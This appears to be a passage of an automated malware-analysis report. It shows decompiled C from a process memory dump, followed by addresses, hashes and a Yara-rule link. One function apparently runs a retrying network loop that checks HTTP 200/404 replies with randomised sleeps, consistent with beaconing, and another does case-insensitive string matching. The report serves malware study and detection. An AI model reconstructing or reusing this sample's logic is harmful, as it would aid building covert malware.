													E008A96D0(E008B0220(E008A96D0(E008A96D0( &_v472, 0x20), 0x28), _v472, 0), 0x29);
												}
												_t822 = _v472;
												E008A7FA0( &_v668);
												E008B0B30(_t603, _v472, _v668);
												E008B0B10( &_v672);
												_push( *_t603);
												_t565 = E008B8820(_t603,  &_v588, _t857, _t871);
												__eflags = _t565;
												if(_t565 == 0) {
													E008B37E0( &_v588,  *_t603, _v588);
												}
												E008A8CA0( &_v652);
												__eflags = _v656;
												if(_v656 != 0) {
													_t822 = _v660;
													__eflags = _t822;
													if(_t822 == 0) {
														L86:
														_t567 = 1;
													} else {
														__eflags = _t822 - 0xffffffff;
														if(_t822 == 0xffffffff) {
															goto L86;
														} else {
															_t567 = 0;
														}
													}
													__eflags = _t567;
													if(_t567 == 0) {
														E008BBF00(_t822);
													}
												}
												_v660 = 0;
												goto L38;
											} else {
												goto L70;
											}
										}
										goto L99;
									}
								}
								L38:
								_t871 = _t871 + 1;
								__eflags = _t871 -  *((intOrPtr*)(_t878 + 0x14c));
							} while (_t871 <  *((intOrPtr*)(_t878 + 0x14c)));
							_t592 = _v604;
						}
						_t389 = _v600;
						__eflags =  *((char*)(_t389 + 0xb)) - 0x28;
						if( *((char*)(_t389 + 0xb)) < 0x28) {
							_t867 = _v608;
							E008A8CA0( &_v456);
							E008A8CA0( &_v464);
							E008B7560(_t878 + 0x14c, _t857, _t867);
							E008A8CA0( &_v552);
							__eflags = _v556;
							if(_v556 != 0) {
								_t849 = _v560;
								__eflags = _t849;
								if(_t849 == 0) {
									L64:
									_t519 = 1;
								} else {
									__eflags = _t849 - 0xffffffff;
									if(_t849 == 0xffffffff) {
										goto L64;
									} else {
										_t519 = 0;
									}
								}
								__eflags = _t519;
								if(_t519 == 0) {
									E008BBF00(_t849);
								}
							}
							_v560 = 0;
						} else {
							_t521 = E008B9650(_t878 + 0x7c);
							_t190 = _t521 + 4; // 0x4
							E008B9670(_t878 + 0x80, _t190);
							_t857 = _t521 + 0xfffffffc;
							__eflags = _t857;
							if(_t857 > 0) {
								_t869 = E008B9640(_t878 + 0x80, 8);
								E008A0BC0(_t531, E008B9640(_t878 + 0x80, 4), _t857);
								_t878 = _t878 + 0xc;
							}
							 *((intOrPtr*)(E008B9640(_t878 + 0x80, 4))) = 0xd2b02901;
							E008A8CA0(_t878 + 0xd4);
							E008A8CA0( &_v468);
							E008B7560( &_v340, _t857, _t869);
							E008A8CA0( &_v556);
							__eflags = _v560;
							if(_v560 != 0) {
								_t822 = _v560;
								__eflags = _t822;
								if(_t822 == 0) {
									L47:
									_t529 = 1;
								} else {
									__eflags = _t822 - 0xffffffff;
									if(_t822 == 0xffffffff) {
										goto L47;
									} else {
										_t529 = 0;
									}
								}
								__eflags = _t529;
								if(_t529 == 0) {
									E008BBF00(_t822);
								}
							}
							goto L50;
						}
						L52:
						E0089ABE0(_t878 + 0x94, 0);
						E008A83B0( &_v512);
						E008B6EC0(_t878 + 0x9c, _v512, 0);
						E008B0B10(_t878 + 0x9c);
						_t400 = E008B37E0(E008B88F0( &_v584), _v528,  *_t399);
						_t858 = _t878 + 0xa4;
						E008B7FC0(_t400, _t878 + 0xa4, 0x3b);
						_v452 = E008A0B60(E008B6040(_v528, 0x7fffffff));
						E008B9710( &_v348,  &_v452, 4);
						E008B9710(_t878 + 0x160,  *((intOrPtr*)(_t878 + 0xa4)), E008B6040( *((intOrPtr*)(_t878 + 0xa4)), 0x7fffffff));
						E008B0B10(_t878 + 0xa4);
						E008B0B10( &_v560);
						E008B7560( &_v616, _t878 + 0xa4, _t867);
						E008B06A0(_t878 + 0xb0, _t874, 0);
						E008B06A0( &_v532, _t874, 0);
						E008B06A0( &_v528, _t874, 0);
						_push(0);
						E008B9350( &_v644);
						 *((intOrPtr*)(_t878 + 0xe4)) = 0;
						 *((intOrPtr*)(_t878 + 0xe8)) = 0;
						_v488 = 0;
						_t416 = E008A15C0(0xa1310f65, 0xf95c938e);
						__eflags = _t416;
						if(_t416 == 0) {
							_t594 = 0;
							__eflags = 0;
							_t417 =  *0x00000000 & 0x0000ffff;
							__eflags = _t417;
							while(_t417 != 0) {
								__eflags = _t417 - 0x3d;
								if(_t417 != 0x3d) {
									E008A83B0( &_v404);
									E008B37E0(_t878 + 0xec, _v404,  *((intOrPtr*)(_t878 + 0xe4)));
									E008B0B10(_t878 + 0x10c);
								}
								_t594 = _t594 + 2 + E008B0180(_t594, 0x7fffffff, _t867) * 2;
								_t417 =  *_t594 & 0x0000ffff;
								__eflags = _t417;
							}
							E008B7FC0(E008B88F0(E008B3EC0(_t878 + 0xe4)),  &_v476, 0xa);
							E008B6EC0( &_v508, _v484, 0);
							E008B0B10( &_v476);
							E008B7560(_t878 + 0xe4, _t858, _t867);
							_v440 = E008A0B60(E008B6040(_v516, 0x7fffffff));
							E008B9710( &_v344,  &_v440, 4);
							E008B9710( &_v352, _v524, E008B6040(_v524, 0x7fffffff));
							E008B9510( &_v628);
							E008B0B10( &_v516);
							E008B0B10( &_v524);
							E008B0B10( &_v532);
							E008B9510( &_v580);
							E008A8CA0( &_v564);
							E008B0B10( &_v484);
							goto L2;
						} else {
							asm("int3");
							return _t416;
						}
						goto L99;
						L50:
						_t592 = _t592 + 1;
						_v560 = 0;
						__eflags = _t592 - 2;
					} while (_t592 < 2);
					_t867 = _v608;
					goto L52;
				} else {
					L2:
					E0089ABE0( &_v260, 2);
					E008B1EB0( &_v260, _t886,  &_v244, 0x3b);
					E008B0B10( &_v268);
					_push(E008B9650(_t878 + 0x158));
					E008B9350( &_v304);
					_v620 =  *((intOrPtr*)(_t878 + 0x1ac));
					_v624 = E008B6040( *((intOrPtr*)(_t878 + 0x1ac)), 0x7fffffff);
					_t444 = E008B9640( &_v340, 0);
					_t445 = E008B9650( &_v344);
					_t446 = E008B9640( &_v312, 0);
					_push(0);
					_push(0);
					_push(_t446);
					_push(_t445);
					_push(_t444);
					_t832 = _v632;
					E008BE5D0(_v628, _v632, _t867);
					_t449 = E008BA190(_t878 + 0x178);
					_push(0);
					E008B9350(_t878 + 0x1e4);
					_v244 = E008A0B60(_t449);
					E008B9710(_t878 + 0x1ec,  &_v244, 4);
					_t454 = E008B9640( &_v348, 0);
					E008B9710( &_v244, _t454, E008B9650( &_v352));
					E008B9510( &_v360);
					E008B0B10(_t878 + 0x1ac);
					E008B9510(_t878 + 0x158);
					E008B0B10(_t878 + 0x194);
					_push(0);
					E008B9350(_t878 + 0x1f8);
					_push(0);
					E008B9350( *((intOrPtr*)(_t878 + 0x1c8)));
					_t860 =  *0x8cb260; // 0xec1fb0
					if(_t860 == 0) {
						_push(0x10);
						_t861 = E008A1030();
						_t878 = _t878 + 4;
						__eflags = _t861;
						if(_t861 == 0) {
							_t861 = 0;
							__eflags = 0;
						} else {
							 *(_t861 + 4) = 0;
							 *((intOrPtr*)(_t861 + 8)) = 0;
							 *((intOrPtr*)(_t861 + 0xc)) = 0;
						}
						 *_t861 =  *0x8cb024 & 0x0000ffff;
						_t832 =  *0x8cb02b & 0x000000ff;
						 *0x8cb260 = _t861;
						__eflags = ( *0x8cb02b & 0x000000ff) - 0xa;
						if(( *0x8cb02b & 0x000000ff) <= 0xa) {
						}
						__eflags =  *0x8cb02b & 0x000000ff;
						if(( *0x8cb02b & 0x000000ff) > 0) {
							_t864 = 0;
							__eflags = 0;
							_t602 = _t878 + 0x134;
							do {
								 *(_t878 + 0x128) = 0;
								_t507 = _t864 + _t864 * 2;
								_t832 =  *(0x8cb02c + _t507 * 2);
								_v420 =  *(0x8cb02c + _t507 * 2);
								 *((short*)(_t878 + 0x124)) =  *(0x8cb030 + _t507 * 2) & 0x0000ffff;
								E008C3100(_t602,  &_v420, _t874, _t602);
								_t755 =  *0x8cb260; // 0xec1fb0
								E008B37E0(_t755 + 4, _v404,  *((intOrPtr*)(_t755 + 4)));
								E008B0B10(_t602);
								_t864 = _t864 + 1;
								__eflags = _t864 - ( *0x8cb02b & 0x000000ff);
							} while (_t864 < ( *0x8cb02b & 0x000000ff));
							_t861 =  *0x8cb260; // 0xec1fb0
						}
					}
					_t862 = _t861 + 4;
					E008A22A0(0x3e8, _t832);
					_t600 = 0;
					_t888 = _t867 - 0xffffffff;
					if(_t867 == 0xffffffff) {
						L11:
						_t467 = _t600;
						asm("cdq");
						_t833 = _t467 %  *_t862;
						_t867 = _t467 %  *_t862;
					}
					E008C31A0(_t600, _t878 + 0x224, _t862);
					 *(_t878 + 0x23c) = 1;
					 *((intOrPtr*)(_t878 + 0x264)) = 0x12c;
					if(E008C3370(_t600, _t878 + 0x228, _t862, _t867, _t888, E008B7600(_t862, _t867)) == 0) {
						L5:
						E008C3260(_t878 + 0x224, _t833, _t867);
						_t600 = _t600 + 1;
						_t888 = _t600;
						if(_t600 != 0) {
							_t476 = _t600;
							asm("cdq");
							__eflags = _t476 %  *_t862;
							if(_t476 %  *_t862 != 0) {
								_t837 = 0xb4;
								_t478 = E008BE170(0x78, 0xb4);
							} else {
								_t837 = 0x168;
								_t478 = E008BE170(0xf0, 0x168);
							}
							__eflags = _t478 * 0x3e8;
							E008A22A0(_t478 * 0x3e8, _t837);
						} else {
							E008A22A0(0x3e8, _t833);
						}
						goto L11;
					}
					_push(_t878 + 0x1e4);
					_push( &_v192);
					E008C3820(_t878 + 0x22c);
					_t833 = _t878 + 0x204;
					_push(_t878 + 0x204);
					E008B9520( &_v216);
					E008B9510(_t878 + 0x204);
					__eflags =  *(_t878 + 0x224);
					if( *(_t878 + 0x224) != 0) {
						goto L5;
					}
					_t833 = _v120;
					__eflags = _t833 - 0xc8;
					if(_t833 != 0xc8) {
						__eflags = _t833 - 0x194;
						if(_t833 != 0x194) {
							goto L5;
						}
					}
					_t838 = _a4 & 0x000000ff;
					__eflags = _a4 & 0x000000ff;
					if((_a4 & 0x000000ff) != 0) {
						_push(0);
						E008B9350( &_v284);
						_v264 = E008A0B60(E008B9A90(_t878 + 0x1f4, _t867));
						__eflags = E008BA190(_t878 + 0x1f4) - _v264;
						if(__eflags == 0) {
							E0089ABE0( &_v408, 2);
							E008B1EB0( &_v408, __eflags, _t878 + 0x144, 0x3b);
							E008B0B10(_t878 + 0x13c);
							_push(E008B9650(_t878 + 0x1f4));
							E008B9350( &_v480);
							_v344 =  *((intOrPtr*)(_t878 + 0x144));
							 *((intOrPtr*)(_t878 + 0xf4)) = E008B6040( *((intOrPtr*)(_t878 + 0x144)), 0x7fffffff);
							_v340 = E008B9640(_t878 + 0x1f8, 0);
							_v344 = E008B9650( &_v240);
							_t497 = E008B9640( &_v488, 0);
							_push(0);
							_push(0);
							_push(_t497);
							_push(_v348);
							_push(_v344);
							E008BE5D0(_v352,  *((intOrPtr*)(_t878 + 0x108)), _t867);
							_push( &_v512);
							E008B9520( &_v328);
							E008B9510( &_v516);
							__eflags = _a8 & 0x000000ff;
							if((_a8 & 0x000000ff) != 0) {
								E008B9850(_t878 + 0x1bc,  &_v692, 0x80);
								E008B9510( &_v700);
							}
							E008B0B10(_t878 + 0x144);
						}
						_t833 = _t878 + 0x1b4;
						_push(_t878 + 0x1b4);
						E008B9520( *((intOrPtr*)(_t878 + 0x1c4)));
						E008B9510( &_v320);
						_t506 = E008B9660(_v304);
						__eflags = _t506;
						if(_t506 != 0) {
							goto L5;
						}
					}
					E008C3260(_t878 + 0x224, _t838, _t867);
					E008B9510(_t878 + 0x1f4);
					E008B9510(_t878 + 0x1e4);
					 *0x8cb000 = _t867;
					return _v268;
				}
				L99:
			}

0x00896ad1
0x00896ad6
0x00896ad7
0x00896ad8
0x00896ad9
0x00896adf
0x00896ae8
0x00896aec
0x00896afd
0x00896b05
0x00896b07
0x00896b0c
0x00896b12
0x00897967
0x00897969
0x0089796e
0x00897972
0x00897975
0x0089797a
0x0089798b
0x0089797c
0x0089797c
0x00897980
0x00897983
0x00897986
0x00897986
0x00897993
0x0089799e
0x008979a4
0x008979ad
0x008979b0
0x008979b0
0x008979c0
0x008979c2
0x008979c8
0x008979d1
0x008979d5
0x008979d7
0x008979d7
0x008979e2
0x008979f4
0x008979fb
0x00897a0b
0x00897a10
0x00897a23
0x00897a2a
0x00897a2f
0x00897a37
0x00897a37
0x00897a3b
0x00897a40
0x00897a44
0x00897a44
0x008979c2
0x00896b23
0x00896b32
0x00896b40
0x00896b53
0x00896b56
0x00896b5c
0x00896b61
0x00896b67
0x00896b69
0x00896b6b
0x00896b70
0x00896b79
0x00896b87
0x00896b9a
0x00896ba6
0x00896bbc
0x00896bd4
0x00896be5
0x00896bfa
0x00896c06
0x00896c0b
0x00896c14
0x00896c1c
0x00896c30
0x00896c43
0x00896c4f
0x00896c5b
0x00896c67
0x00896c78
0x00896c8d
0x00896c9d
0x00896cb6
0x00896cc2
0x00896cda
0x00896cea
0x00896cf6
0x00896cfe
0x00896d05
0x00896d11
0x00896d16
0x00896d1d
0x00897241
0x0089724f
0x0089726f
0x0089727d
0x008972a6
0x008972ab
0x008972b2
0x008972b7
0x008972bb
0x008972c3
0x008972c5
0x008972ca
0x008972ce
0x008972ce
0x008972d0
0x008972d8
0x008972e5
0x008972ec
0x008972fa
0x008972ff
0x00897300
0x00897302
0x00897302
0x00897307
0x00897307
0x00897309
0x0089730d
0x00897311
0x00897315
0x00897319
0x0089731d
0x0089731d
0x00897330
0x00897341
0x0089734f
0x0089735d
0x00897362
0x0089736a
0x0089736c
0x00897370
0x00897370
0x00897372
0x0089737f
0x00897383
0x00897388
0x0089738a
0x0089739a
0x0089739c
0x0089777d
0x00897781
0x00897789
0x0089778e
0x0089779c
0x008977ae
0x008977b5
0x008977c3
0x008977d3
0x008977dc
0x008977e5
0x008977f1
0x008977f6
0x008977f8
0x00897811
0x00897815
0x0089781a
0x0089781f
0x00897821
0x00897825
0x00897827
0x00897832
0x00897832
0x00897829
0x00897829
0x0089782c
0x00000000
0x0089782e
0x0089782e
0x0089782e
0x0089782c
0x00897837
0x00897839
0x0089783c
0x0089783c
0x00897839
0x00897841
0x00000000
0x008977fa
0x00897808
0x0089780d
0x0089780f
0x0089784e
0x0089785b
0x0089786c
0x00897873
0x00897881
0x00897891
0x0089789a
0x008978a3
0x008978af
0x008978b4
0x008978b6
0x008978e3
0x008978e3
0x008978e8
0x008978f3
0x008978fe
0x00897907
0x0089790c
0x00897912
0x00897917
0x00897919
0x00897925
0x00897925
0x0089792e
0x00897933
0x00897938
0x0089793a
0x0089793e
0x00897940
0x0089794b
0x0089794b
0x00897942
0x00897942
0x00897945
0x00000000
0x00897947
0x00897947
0x00897947
0x00897945
0x00897950
0x00897952
0x00897955
0x00897955
0x00897952
0x0089795a
0x00000000
0x00000000
0x00000000
0x00000000
0x0089780f
0x00000000
0x008977f8
0x0089739c
0x008973a2
0x008973a2
0x008973a3
0x008973a3
0x008973ac
0x008973ac
0x008973b0
0x008973b4
0x008973b8
0x00897718
0x00897723
0x0089772f
0x0089773b
0x00897744
0x00897749
0x0089774e
0x00897750
0x00897754
0x00897756
0x00897761
0x00897761
0x00897758
0x00897758
0x0089775b
0x00000000
0x0089775d
0x0089775d
0x0089775d
0x0089775b
0x00897766
0x00897768
0x0089776b
0x0089776b
0x00897768
0x00897770
0x008973be
0x008973c2
0x008973c9
0x008973d4
0x008973d9
0x008973dc
0x008973de
0x008973ee
0x00897401
0x00897406
0x00897406
0x00897417
0x00897424
0x00897430
0x0089743c
0x00897445
0x0089744a
0x0089744f
0x00897451
0x00897455
0x00897457
0x00897462
0x00897462
0x00897459
0x00897459
0x0089745c
0x00000000
0x0089745e
0x0089745e
0x0089745e
0x0089745c
0x00897467
0x00897469
0x0089746c
0x0089746c
0x00897469
0x00000000
0x0089744f
0x00897487
0x00897490
0x008974a3
0x008974b8
0x008974c4
0x008974dd
0x008974e4
0x008974ee
0x0089750b
0x00897523
0x00897544
0x0089754b
0x00897557
0x00897560
0x0089756e
0x0089757c
0x0089758a
0x0089758f
0x00897595
0x0089759c
0x008975a3
0x008975aa
0x008975bb
0x008975c0
0x008975c2
0x008975ca
0x008975ca
0x008975cc
0x008975cf
0x008975d1
0x008975d3
0x008975d6
0x008975e1
0x008975fb
0x00897607
0x00897607
0x00897618
0x0089761c
0x0089761f
0x0089761f
0x00897642
0x00897657
0x0089765e
0x0089766a
0x00897687
0x0089769f
0x008976c0
0x008976c9
0x008976d5
0x008976e1
0x008976ed
0x008976f6
0x00897702
0x0089770e
0x00000000
0x008975c4
0x008975c4
0x008975c5
0x008975c5
0x00000000
0x00897471
0x00897471
0x00897472
0x0089747a
0x0089747a
0x00897483
0x00000000
0x00896d23
0x00896d23
0x00896d2f
0x00896d45
0x00896d51
0x00896d62
0x00896d6a
0x00896d7b
0x00896d84
0x00896d91
0x00896d9f
0x00896daf
0x00896db8
0x00896db9
0x00896dba
0x00896dbb
0x00896dbc
0x00896dc1
0x00896dc5
0x00896dd1
0x00896ddf
0x00896de1
0x00896ded
0x00896e05
0x00896e13
0x00896e2f
0x00896e3b
0x00896e47
0x00896e53
0x00896e5f
0x00896e64
0x00896e6d
0x00896e72
0x00896e7b
0x00896e80
0x00896e88
0x00897177
0x0089717e
0x00897180
0x00897183
0x00897185
0x00897194
0x00897194
0x00897187
0x00897189
0x0089718c
0x0089718f
0x0089718f
0x0089719d
0x0089719f
0x008971a6
0x008971ac
0x008971af
0x008971af
0x008971bf
0x008971c1
0x008971c7
0x008971c7
0x008971c9
0x008971d0
0x008971d0
0x008971db
0x008971de
0x008971ed
0x008971f4
0x00897204
0x00897209
0x0089721c
0x00897223
0x00897228
0x00897230
0x00897230
0x00897234
0x00897234
0x008971c1
0x00896e93
0x00896e96
0x00896e9b
0x00896e9d
0x00896ea0
0x00896f30
0x00896f30
0x00896f32
0x00896f33
0x00896f35
0x00896f35
0x00896ead
0x00896eb4
0x00896ebf
0x00896edf
0x00896ee1
0x00896ee8
0x00896eed
0x00896eed
0x00896eee
0x00896efc
0x00896efe
0x00896f01
0x00896f03
0x00896f1b
0x00896f20
0x00896f05
0x00896f0a
0x00896f0f
0x00896f0f
0x00896f25
0x00896f2b
0x00896ef0
0x00896ef5
0x00896ef5
0x00000000
0x00896eee
0x00896f43
0x00896f4b
0x00896f53
0x00896f58
0x00896f5f
0x00896f67
0x00896f73
0x00896f78
0x00896f80
0x00000000
0x00000000
0x00896f86
0x00896f8d
0x00896f93
0x00896f95
0x00896f9b
0x00000000
0x00000000
0x00896f9b
0x00896fa1
0x00896fa5
0x00896fa7
0x00896fb0
0x00896fb2
0x00896fca
0x00896fdd
0x00896fe4
0x00897062
0x00897078
0x00897084
0x0089709c
0x0089709d
0x008970ae
0x008970ba
0x008970cf
0x008970e2
0x008970f2
0x008970f9
0x008970fa
0x008970fb
0x008970fc
0x00897103
0x00897118
0x00897124
0x0089712c
0x00897138
0x00897141
0x00897143
0x00897167
0x00897170
0x00897170
0x0089714c
0x0089714c
0x00896fe6
0x00896fed
0x00896ff1
0x00896ffd
0x00897009
0x0089700e
0x00897010
0x00000000
0x00000000
0x00897010
0x0089701d
0x00897029
0x00897035
0x0089703a
0x00897053
0x00897053
0x00000000

Strings

!, xrefs: 00897495

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID: !
API String ID: 0-1526722801
Opcode ID: 57fde4819b951bfddf94b474e1b904267ca4fe66ff1671f72997941c84f81467
Instruction ID: ef4af8b3990037f2e2a47e38363c6cfa8c723a3d707cc427a210818131399afa
Opcode Fuzzy Hash: 57fde4819b951bfddf94b474e1b904267ca4fe66ff1671f72997941c84f81467
Instruction Fuzzy Hash: 73823C305183419BD724EB28C892BEFB7E5FF95300F54492DE59AC62A1EF70A905CB63

Uniqueness

Uniqueness Score: -1.00%

Function 008AC590, Relevance: 2.1, Strings: 1, Instructions: 878
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E008AC590(signed int* __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed short* _t304;
				unsigned int _t312;
				signed int _t313;
				signed short** _t319;
				signed short* _t323;
				signed int* _t325;
				signed int _t330;
				signed int _t334;
				signed int _t338;
				unsigned int _t340;
				unsigned int _t341;
				signed int _t343;
				unsigned int _t344;
				signed int _t345;
				signed int _t349;
				signed int _t350;
				signed int _t352;
				signed int _t357;
				signed int _t360;
				unsigned int _t366;
				signed int _t367;
				void* _t373;
				signed int _t376;
				signed int _t377;
				unsigned int _t383;
				unsigned int _t384;
				signed int _t386;
				signed int _t387;
				signed int _t395;
				signed int _t396;
				signed int _t398;
				signed int* _t405;
				signed int _t406;
				signed int _t412;
				signed int _t418;
				signed int _t421;
				signed int _t426;
				signed int _t432;
				signed int _t434;
				signed int _t441;
				signed int _t443;
				signed int _t449;
				signed int _t452;
				signed int _t457;
				signed int _t459;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t469;
				signed int _t476;
				signed int _t479;
				signed int _t480;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				void* _t493;
				signed int _t494;
				signed int _t495;
				signed int _t498;
				intOrPtr* _t500;
				signed int _t501;
				signed int _t502;
				intOrPtr* _t503;
				signed int _t504;
				signed int _t505;
				signed int _t508;
				signed int _t510;
				signed int _t513;
				signed int _t518;
				void* _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				void* _t523;
				signed int _t524;
				signed int _t525;
				signed int _t528;
				signed int* _t529;
				signed int _t530;
				signed int _t534;
				signed int _t537;
				signed int _t544;
				signed int _t546;
				signed int _t551;
				signed int _t552;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t559;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t570;
				signed int _t571;
				signed int _t574;
				signed int _t581;
				signed short* _t582;
				signed int _t586;
				signed int _t587;
				signed int _t588;
				signed int _t590;
				signed int _t591;
				signed int _t592;
				signed int _t593;
				intOrPtr* _t594;
				signed int _t595;
				signed short* _t596;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				signed int _t609;
				signed int _t611;
				signed int* _t614;

				_v64 = 0;
				_t405 = __ecx;
				_v60 = 0;
				_push(0x80);
				_t551 = E008A1030();
				_t614 = (_t611 & 0xfffffff0) - 0x34 + 4;
				_t304 = _v64;
				if(_t304 == 0) {
					__eflags = 0;
					 *_t551 = 0;
					L8:
					_v60 = 0x40;
					_v64 = _t551;
					if((_a8 & 0x0000ffff) != 0) {
						__eflags = _t551;
						if(_t551 == 0) {
							_t459 = 0x40;
							_t581 = 0;
							L23:
							_t24 = _t581 + 2; // -2147483652
							_t493 = _t24;
							__eflags = _t493 - 0x40;
							_t494 =  <=  ? 0x40 : _t493;
							__eflags = _t459 - _t494;
							if(_t459 < _t494) {
								_t312 = (_t494 >> 5 >> 0x1a) + _t494 >> 6;
								_t495 = _t494 & 0x8000003f;
								__eflags = _t495;
								if(_t495 < 0) {
									_t495 = (_t495 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t495;
								}
								__eflags = _t495;
								_t313 = _t312 + (0 | _t495 > 0x00000000);
								 *_t614 = _t313 << 6;
								_push(_t313 << 7);
								_t552 = E008A1030();
								_t614 =  &(_t614[1]);
								_t498 = _v64;
								__eflags = _t498;
								if(_t498 == 0) {
									__eflags = 0;
									 *_t552 = 0;
									goto L35;
								} else {
									__eflags = _t552;
									if(_t552 == 0) {
										L33:
										_push(2);
										_push(_t498);
										E008A10B0();
										_t614 =  &(_t614[2]);
										L35:
										_v60 =  *_t614;
										_v64 = _t552;
										L36:
										__eflags = 0;
										 *((short*)(_t552 + _t581 * 2)) = _a8 & 0x0000ffff;
										_t319 =  &_v64;
										 *((short*)( *_t319 + 2 + _t581 * 2)) = 0;
										L37:
										_t582 =  *_t319;
										if(_t582 == 0) {
											L39:
											_t500 = _a4;
											_push(0x80);
											 *_t500 = 0;
											 *((intOrPtr*)(_t500 + 4)) = 0;
											_t406 = E008A1030();
											_t614 =  &(_t614[1]);
											_t323 =  *_a4;
											if(_t323 == 0) {
												 *_t406 = 0;
												L60:
												_t325 = _a4;
												 *_t325 = _t406;
												_t325[1] = 0x40;
												L61:
												_push(2);
												_push(_v64);
												E008A10B0();
												_v64 = 0;
												_v60 = 0;
												return _a4;
											}
											if(_t406 == 0) {
												L45:
												_push(2);
												_push(_t323);
												E008A10B0();
												_t614 =  &(_t614[2]);
												goto L60;
											}
											_t501 =  *_t323 & 0x0000ffff;
											 *_t406 = _t501;
											if(_t501 == 0) {
												goto L45;
											}
											_t502 = 0;
											while(1) {
												_t502 = _t502 + 1;
												_t463 =  *(_t323 + _t502 * 4 - 2) & 0x0000ffff;
												 *(_t406 + _t502 * 4 - 2) = _t463;
												if(_t463 == 0) {
													goto L45;
												}
												_t464 =  *(_t323 + _t502 * 4) & 0x0000ffff;
												 *(_t406 + _t502 * 4) = _t464;
												if(_t464 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t330 =  *_t582 & 0x0000ffff;
										if(_t330 != 0) {
											_t554 =  *_t405;
											__eflags = _t554;
											if(_t554 == 0) {
												L52:
												_t503 = _a4;
												_push(0x80);
												 *_t503 = 0;
												 *((intOrPtr*)(_t503 + 4)) = 0;
												_t406 = E008A1030();
												_t614 =  &(_t614[1]);
												_t334 =  *_a4;
												__eflags = _t334;
												if(_t334 == 0) {
													__eflags = 0;
													 *_t406 = 0;
													goto L60;
												}
												__eflags = _t406;
												if(_t406 == 0) {
													L58:
													_push(2);
													_push(_t334);
													E008A10B0();
													_t614 =  &(_t614[2]);
													goto L60;
												}
												_t504 =  *_t334 & 0x0000ffff;
												 *_t406 = _t504;
												__eflags = _t504;
												if(_t504 == 0) {
													goto L58;
												}
												_t505 = 0;
												__eflags = 0;
												while(1) {
													_t505 = _t505 + 1;
													_t465 =  *(_t334 + _t505 * 4 - 2) & 0x0000ffff;
													 *(_t406 + _t505 * 4 - 2) = _t465;
													__eflags = _t465;
													if(_t465 == 0) {
														goto L58;
													}
													_t466 =  *(_t334 + _t505 * 4) & 0x0000ffff;
													 *(_t406 + _t505 * 4) = _t466;
													__eflags = _t466;
													if(_t466 != 0) {
														continue;
													}
													goto L58;
												}
												goto L58;
											}
											__eflags =  *_t554 & 0x0000ffff;
											if(( *_t554 & 0x0000ffff) == 0) {
												goto L52;
											}
											_v24 = _t582;
											__eflags = _t330 - 0x41 - 0x19;
											_t337 =  <=  ? _t330 + 0x20 : _t330;
											_t508 = 0;
											__eflags = 0;
											_t338 = ( <=  ? _t330 + 0x20 : _t330) & 0x0000ffff;
											_v44 = _t338;
											while(1) {
												_t584 =  *(_t554 + _t508 * 2) & 0x0000ffff;
												_t67 = _t584 - 0x41; // 0x7fffffbe
												__eflags = _t67 - 0x19;
												_t68 = _t584 + 0x20; // 0x8000001f
												_t585 =  <=  ? _t68 :  *(_t554 + _t508 * 2) & 0x0000ffff;
												__eflags = ( <=  ? _t68 :  *(_t554 + _t508 * 2) & 0x0000ffff) - _t338;
												if(( <=  ? _t68 :  *(_t554 + _t508 * 2) & 0x0000ffff) == _t338) {
													break;
												}
												_t508 = _t508 + 1;
												__eflags =  *(_t554 + _t508 * 2) & 0x0000ffff;
												if(( *(_t554 + _t508 * 2) & 0x0000ffff) != 0) {
													continue;
												}
												goto L52;
											}
											_t586 = _v24;
											_t469 = _t554 + _t508 * 2;
											__eflags = _t469;
											if(_t469 == 0) {
												goto L52;
											}
											_t510 = _t586 & 0x0000000f;
											asm("pxor xmm0, xmm0");
											_t340 = _t510 & 0x00000001;
											_t412 =  ~_t510 + 0x10 >> 1;
											_v52 = _t412;
											_v36 = _t554;
											_v24 = _t586;
											_t555 = _t412;
											while(1) {
												L68:
												_t587 = _t510;
												__eflags = _t510;
												if(_t510 == 0) {
													goto L74;
												}
												_t421 = 0;
												__eflags = _t340;
												if(_t340 != 0) {
													L78:
													_v28 = _t340;
													_t603 = _v24;
													while(1) {
														__eflags =  *(_t603 + _t421 * 2) & 0x0000ffff;
														if(( *(_t603 + _t421 * 2) & 0x0000ffff) == 0) {
															break;
														}
														_t421 = _t421 + 1;
														__eflags = _t421 - 0x7fffffff;
														if(_t421 < 0x7fffffff) {
															continue;
														}
														_v24 = _t603;
														_t341 = _v28;
														L82:
														_t421 = 0x7fffffff;
														L83:
														 *_t614 = _t421;
														_t588 = 0;
														__eflags = 0;
														_v32 = _t510;
														_v28 = _t341;
														while(1) {
															_t422 =  *(_t469 + _t588 * 2) & 0x0000ffff;
															_t124 = _t422 - 0x61; // 0x7fffff9e
															_t559 =  *(_v24 + _t588 * 2) & 0x0000ffff;
															__eflags = _t124 - 0x19;
															_t127 = _t422 - 0x20; // 0x7fffffdf
															_t423 =  <=  ? _t127 :  *(_t469 + _t588 * 2) & 0x0000ffff;
															_t343 = ( <=  ? _t127 :  *(_t469 + _t588 * 2) & 0x0000ffff) & 0x0000ffff;
															__eflags = _t559 - 0x61 - 0x19;
															_t560 =  <=  ? _t559 - 0x20 : _t559;
															__eflags = _t343 - ( <=  ? _t559 - 0x20 : _t559);
															if(__eflags < 0 || __eflags > 0) {
																break;
															}
															__eflags = _t343;
															if(_t343 == 0) {
																L88:
																_t510 = _v32;
																_t341 = _v28;
																_t563 = _v36;
																_t591 = _v24;
																L89:
																__eflags = _t469;
																if(_t469 == 0) {
																	goto L52;
																}
																_v28 = _t341;
																_v36 = _t563;
																_v24 = _t591;
																_t592 = 0;
																__eflags = 0;
																while(1) {
																	L91:
